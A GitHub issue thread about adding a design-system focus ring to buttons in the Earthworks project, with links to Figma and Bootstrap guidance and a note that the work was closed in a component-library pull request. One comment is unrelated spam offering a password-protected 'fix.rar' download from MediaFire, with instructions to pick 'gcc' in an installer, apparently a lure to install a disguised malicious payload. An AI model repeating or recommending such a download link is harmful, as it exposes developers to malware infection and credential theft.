### ISSUE TITLE
Focus ring for buttons

### ISSUE THREAD

**Issue by dbranchini** [sul-dlss/earthworks#1263]
Focus ring for buttons is defined in the design system. It's intended to work against both light and dark backgrounds, and Alan did it in collaboration with SODA. 

https://www.figma.com/design/K1syTsalaB1nlRftgOi0Pw/DLSS-Components?node-id=802-1231&t=Ifj58b001z3ukX9I-4

Focus rings can be customized in Bootstrap using the following guidelines - https://getbootstrap.com/docs/5.3/helpers/focus-ring/.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dnoneill** [comment]
Closed in component-library https://github.com/sul-dlss/component-library/pull/31
